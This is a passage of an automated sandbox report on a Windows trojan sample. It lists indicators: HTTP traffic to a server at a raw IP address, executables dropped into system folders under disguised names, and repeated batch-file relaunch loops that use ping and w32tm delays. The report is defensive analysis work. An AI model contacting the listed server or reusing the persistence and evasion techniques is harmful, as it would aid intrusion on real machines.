65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 33 38 2e 31 38 30 2e 32 32 38 2e 31 32 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:55:46 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 
(Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:55:58 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 33 38 2e 31 38 30 2e 32 32 38 2e 31 32 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:55:58 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 33 38 2e 31 38 30 2e 32 32 38 2e 31 32 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 100 ContinueData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 75 65 2c 20 31 39 20 4e 6f 76 20 32 30 32 34 20 31 37 3a 35 36 3a 30 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 36 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 33 38 2e 31 38 30 2e 32 32 38 2e 31 32 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:56:08 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 
(Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>
                            Source: oqWNZWQNWoNnROlqjKcKhLM.exe, 00000007.00000002.1443752211.000000000325A000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000000E.00000002.1575711347.0000000003576000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000014.00000002.1687002549.0000000002B97000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000001A.00000002.1826603287.0000000003882000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000022.00000002.1931052438.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000028.00000002.2055005973.000000000290C000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000002E.00000002.2158413526.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000034.00000002.2284751701.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000003A.00000002.2425833967.000000000368A000.00000004.00000800.00020000.00000000.sdmp
                            String found in binary or memory: http://38.180.228.120
                            Source: oqWNZWQNWoNnROlqjKcKhLM.exe, 0000003A.00000002.2425833967.000000000368A000.00000004.00000800.00020000.00000000.sdmp
                            String found in binary or memory: http://38.180.228.120/cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLoca
                            Source: KPFv8ATDx0.exe, 00000000.00000002.1338858265.0000000003270000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000007.00000002.1443752211.000000000325A000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000000E.00000002.1575711347.0000000003576000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000014.00000002.1687002549.0000000002B97000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000001A.00000002.1826603287.0000000003882000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000022.00000002.1931052438.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000028.00000002.2055005973.000000000290C000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000002E.00000002.2158413526.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000034.00000002.2284751701.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000003A.00000002.2425833967.000000000368A000.00000004.00000800.00020000.00000000.sdmp
                            String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exe File created: C:\Windows\ShellExperiences\oqWNZWQNWoNnROlqjKcKhLM.exe
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exe File created: C:\Windows\ShellExperiences\oqWNZWQNWoNnROlqjKcKhLM.exe\:Zone.Identifier:$DATA
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exe File created: C:\Windows\ShellExperiences\0b77faa1f189a8
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC65F4F934_2_00007FFAAC65F4F9
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC66B69D34_2_00007FFAAC66B69D
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC83A69F34_2_00007FFAAC83A69F
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC830D5834_2_00007FFAAC830D58
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC83E14334_2_00007FFAAC83E143
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC8324D434_2_00007FFAAC8324D4
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC8325FA34_2_00007FFAAC8325FA
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC83244034_2_00007FFAAC832440
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC830C7034_2_00007FFAAC830C70
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC81E94834_2_00007FFAAC81E948
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC81E9D834_2_00007FFAAC81E9D8
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC81E9E834_2_00007FFAAC81E9E8
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC81EA2834_2_00007FFAAC81EA28
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC81F34A34_2_00007FFAAC81F34A
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC81E74034_2_00007FFAAC81E740
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC81E89034_2_00007FFAAC81E890
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC804CF834_2_00007FFAAC804CF8
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC8055F034_2_00007FFAAC8055F0
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC805FB034_2_00007FFAAC805FB0
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC803EFA34_2_00007FFAAC803EFA
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC80580834_2_00007FFAAC805808
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC7F000B34_2_00007FFAAC7F000B
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC7F629D34_2_00007FFAAC7F629D
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC804AE034_2_00007FFAAC804AE0
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC8053D334_2_00007FFAAC8053D3
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAACDA194F34_2_00007FFAACDA194F
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAACDAAFA234_2_00007FFAACDAAFA2
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAACDA9B4A34_2_00007FFAACDA9B4A
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAACDB61D234_2_00007FFAACDB61D2
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAACDA93CD34_2_00007FFAACDA93CD
                            Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\ACAUZvYN.log 80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                            Source: KPFv8ATDx0.exe, 00000000.00000000.1295138767.00000000003A2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs KPFv8ATDx0.exe
                            Source: KPFv8ATDx0.exe, 00000000.00000002.1355176832.000000001C0C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs KPFv8ATDx0.exe
                            Source: KPFv8ATDx0.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs KPFv8ATDx0.exe
                            Source: KPFv8ATDx0.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: KPFv8ATDx0.exe, Va3hUK9lmuW7m1ZiFxJ.csCryptographic APIs: 'CreateDecryptor'
                            Source: classification engineClassification label: mal100.troj.evad.winEXE@83/166@0/1
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Program Files\Windows Multimedia Platform\oqWNZWQNWoNnROlqjKcKhLM.exe
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Users\user\Desktop\hhWvCZxk.log
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5576:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5260:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5780:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7296:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_03
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeMutant created: \Sessions\1\BaseNamedObjects\Local\285180168aeb70ed1fd4bb736d89ef8294b44ac1e87ce1ee0993e5a09156e65b
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3920:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5768:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7468:120:WilError_03
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile created: C:\Users\user\AppData\Local\Temp\ki5mgHFA5B
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\iHmrx8Dkeu.bat"
                            Source: KPFv8ATDx0.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: KPFv8ATDx0.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile read: C:\Users\desktop.ini
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: KPFv8ATDx0.exeReversingLabs: Detection: 71%
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeFile read: C:\Users\user\Desktop\KPFv8ATDx0.exe
                            Source: unknownProcess created: C:\Users\user\Desktop\KPFv8ATDx0.exe "C:\Users\user\Desktop\KPFv8ATDx0.exe"
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\iHmrx8Dkeu.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\JRGN3N9ZXF.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aehWhM7TGU.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\cWXsH5vMZ0.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\pFxSEGDzP3.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yJr0BespZg.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bgR6NVhjy4.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bqMLTwU6O8.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4XCyKdTKaY.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess created: unknown unknown
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: version.dll
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: wldp.dll
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: profapi.dll
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: ktmw32.dll
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: ntmarta.dll
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: propsys.dll
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeSection loaded: dlnashext.dll
